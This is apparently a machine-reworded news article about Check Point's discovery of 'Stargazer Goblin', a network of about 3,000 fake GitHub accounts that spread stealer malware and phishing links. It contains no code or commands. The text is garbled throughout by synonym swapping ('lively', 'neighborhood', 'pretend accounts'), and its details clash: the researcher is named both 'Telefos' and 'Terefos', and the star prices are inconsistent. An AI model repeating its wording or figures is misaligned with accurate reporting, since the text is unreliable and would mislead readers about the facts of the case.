A secret community of round 3,000 “ghost” accounts on GitHub has been discovered working the code-hosting platform to advertise malware and phishing hyperlinks. A latest investigation by cybersecurity agency Check Point uncovered the actions of a cybercriminal group that researchers have dubbed “Stargazer Goblin.”
Stargazer Goblin has been lively on Microsoft-owned GitHub, the world’s largest open-source code repository, since June 2023, and even earlier than. The web site hosts hundreds of thousands of builders’ tasks, and Stargazer Goblin has used neighborhood instruments to extend visibility and legitimacy for its malicious code repositories.
Antonis Telefos, the malware reverse engineer at Check Point who found the community, highlighted the sophistication of the operation, noting that whereas GitHub has been focused by cybercriminals earlier than, the size and technique of this operation is unprecedented.
The repositories and stars are purchased and bought by cybercrime-related Telegram channels and numerous legal marketplaces. Telegram is often utilized by cybercriminals, their purchasers and victims. Telefos mentioned he has not seen such a community of pretend accounts working on GitHub.
Check Point’s Stargazers Ghost Network distributes malware disguised as authentic instruments for social media, gaming and cryptocurrency purposes, together with code to run a VPN or license software program equivalent to Adobe Photoshop. These repositories goal Windows customers searching for free software program on-line.
The community expenses different hackers a price for its providers. Check Point recognized numerous sorts of malware distributed by this community, together with Atlantida Stealer, Rhadamanthys, and Lumma Stealer. Terefos found the community whereas investigating situations of Atlantida Stealer.
Stargazer Goblin advertises on cybercrime boards and has a Telegram channel providing 100 stars for $10 and 50 stars for $50. It additionally clones current repositories and supplies trusted accounts. According to Check Point’s analysis, the community might have raised as much as $100,000 because it started these operations as early as August 2022. Between mid-May and mid-June of this 12 months alone, the operator reportedly made round $8,000.
Terefos has noticed authentic repositories being hijacked and transformed into malicious repositories utilizing stolen credentials. If authentic customers fork these compromised repositories, the malicious code can unfold additional. Automated instruments assist Terefos establish accounts linked to the community by recognizing widespread traits equivalent to comparable templates and tags.
When GitHub identifies accounts that assist unlawful malware campaigns, it disables the person accounts for violating GitHub’s phrases of service. Alexis Wales, GitHub’s vice chairman of safety operations, mentioned the corporate has devoted groups to detect and take away such content material and accounts. These groups use a mix of handbook evaluate and large-scale detection utilizing machine studying to establish suspicious conduct.
Unfortunately, GitHub is a big goal with over 100 million customers and 420 million repositories, so it isn’t that onerous for cybercriminals to cover throughout the person base like grains of sand on a seashore.
Jake Moore, world cybersecurity advisor at safety agency Eset, warned GitHub customers in regards to the dangers of downloading malicious code: Signs of a malicious repository embrace sudden code modifications, code that accesses exterior sources, and hard-coded credentials or API keys.
The Stargazer Goblin community could also be much more widespread, as evidenced by YouTube accounts sharing malicious hyperlinks by their movies, and Terefos stresses that the total extent of the community’s actions is just not but absolutely understood.